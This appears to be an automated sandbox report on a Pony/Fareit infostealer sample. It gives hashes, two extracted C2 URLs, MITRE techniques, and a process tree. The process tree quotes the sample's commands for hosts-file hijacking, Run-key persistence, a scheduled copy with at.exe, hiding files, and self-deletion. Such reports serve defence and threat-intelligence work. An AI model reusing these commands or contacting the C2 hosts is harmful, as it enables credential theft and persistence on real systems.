Analysis

  • max time kernel
    143s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2024 15:10

General

  • Target

    0f50229137d187e723c33b5dfd963332_JaffaCakes118.exe

  • Size

    83KB

  • MD5

    0f50229137d187e723c33b5dfd963332

  • SHA1

    470e64bc418e188de954cd989776c6156d5ce85b

  • SHA256

    e1a49da6104537c8184eeba014719b14afd64186e1169cf577c3c375b166bc4b

  • SHA512

    f506b7472b5c1a2f83ef54924e290197e9193a19dba3a03996a646fbdf3e0e11d9635030ed898b6045851ba12d5a7594f41072580c46efaa7060dd8deebedb62

  • SSDEEP

    1536:FdUlMy7UoXyzkCjrTAPZXFG8DFE1Zbwr8duBFpv28KEVtlm4B01P:F+iy7UdwAwFJE1C8wvAEVvf2

Malware Config

Extracted

Family

pony

C2

http://fypse2u.info:1654/ero.php

http://crytili.info:1654/ero.php

Signatures

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Drops file in Drivers directory 4 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f50229137d187e723c33b5dfd963332_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0f50229137d187e723c33b5dfd963332_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy %WINDIR%\system32\drivers\etc\hosts %WINDIR%\system32\drivers\etc\hosts.sam /Y && at 15:13:00 cmd.exe /c copy %TEMP%\259455184FdOh %WINDIR%\system32\drivers\etc\hosts /Y
      2⤵
      • Drops file in Drivers directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\SysWOW64\at.exe
        at 15:13:00 cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\259455184FdOh C:\Windows\system32\drivers\etc\hosts /Y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2708
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run /v 259455200 /t REG_SZ /d "cmd.exe /c copy %TEMP%\259455184FdOh %WINDIR%\system32\drivers\etc\hosts /Y && attrib +H %WINDIR%\system32\drivers\etc\hosts /f
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run /v 259455200 /t REG_SZ /d "cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\259455184FdOh C:\Windows\system32\drivers\etc\hosts /Y && attrib +H C:\Windows\system32\drivers\etc\hosts /f
        3⤵
        • Adds Run key to start application
        • Hide Artifacts: Hidden Files and Directories
        • System Location Discovery: System Language Discovery
        PID:2532
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping -n 10 127.0.0.1 > NUL && del "C:\Users\Admin\AppData\Local\Temp\0f50229137d187e723c33b5dfd963332_JaffaCakes118.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:624
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1932
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {D4BFAC5D-CE4E-4B33-9F47-12A887888934} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\system32\cmd.exe
      cmd.exe /c copy C:\Users\Admin\AppData\Local\Temp\259455184FdOh C:\Windows\system32\drivers\etc\hosts /Y
      2⤵
      • Drops file in Drivers directory
      PID:2236

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\259455184FdOh

    Filesize

    1KB

    MD5

    ef1c955611e52d0c4851a1ce6355c8f2

    SHA1

    e7153b3786f351220de0470c12cbab22c77433fe

    SHA256

    856973a435fabebbd2b56c8d3b2ccda8b3fcd359c5c83efd76b1ba778e172a63

    SHA512

    39f1dc50866d3bad31c0c9b793a4917c847d95dc23765e7967af763c7977a869d4a7ca10bd9aa8c1e041f460dcf1ef901e017f53a9b14fbb2838d7483d396826

  • memory/2652-0-0x0000000000403000-0x0000000000408000-memory.dmp

    Filesize

    20KB

  • memory/2652-1-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/2652-2-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/2652-6-0x0000000000403000-0x0000000000408000-memory.dmp

    Filesize

    20KB

  • memory/2652-7-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/2652-16-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB